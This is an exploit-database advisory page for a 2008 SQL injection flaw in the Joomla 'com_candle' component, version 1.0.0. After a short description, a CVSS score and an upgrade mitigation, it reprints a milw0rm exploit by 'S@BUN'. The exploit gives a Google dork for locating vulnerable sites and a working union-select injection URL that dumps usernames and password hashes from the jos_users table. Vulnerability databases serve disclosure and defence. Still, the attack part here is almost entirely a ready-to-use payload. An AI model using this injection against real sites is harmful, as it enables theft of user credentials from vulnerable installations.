JOOMLA com_candle SQL Injection(cid)

vendor:

Candle Component

by:

S@BUN

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Candle Component

Affected Version From: 1.0.0

Affected Version To: 1.0.0

Patch Exists: YES

Related CWE: N/A

CPE: a:joomla:joomla

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

JOOMLA com_candle SQL Injection(cid)

A vulnerability exists in Joomla com_candle component which allows an attacker to inject arbitrary SQL commands via the 'cID' parameter in a 'index.php' script. This can be exploited to gain access to the database and potentially compromise the system.

Mitigation:

Upgrade to the latest version of Joomla com_candle component.

Source

Exploit-DB raw data:

#############################################
#
########### JOOMLA com_candle SQL Injection(cid)
#
#############################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
####
####MAiL : hackturkiye.hackturkiye@gmail.com
#
#############################################
#
##DORK 1 : allinurl:"com_candle"
#
#############################################
EXPLOIT :

index.php?option=com_candle&task=content&cID=-9999/**/union/**/select/**/0x3a,username,0x3a,password,0x3a,0x3a/**/from/**/jos_users/*

#############################################
################# S@BUN ####################
#############################################
######## hackturkiye.hackturkiye@gmail.com ######
#############################################

<mosinstall type="component" version="1.0.0">
	<name>Candle</name>
	<author>Son Vu</author>
	<creationDate>March 2007</creationDate>
	<copyright>(C) 2007 Open Source Matters. All rights reserved.</copyright>
	<license>http://www.gnu.org/copyleft/gpl.html GNU/GPL</license>

	<authorEmail>sora4g@gmail.com</authorEmail>
	<authorUrl></authorUrl>
	<version>1.0.0</version>
	<description>Candle Component.</description>

# milw0rm.com [2008-03-08]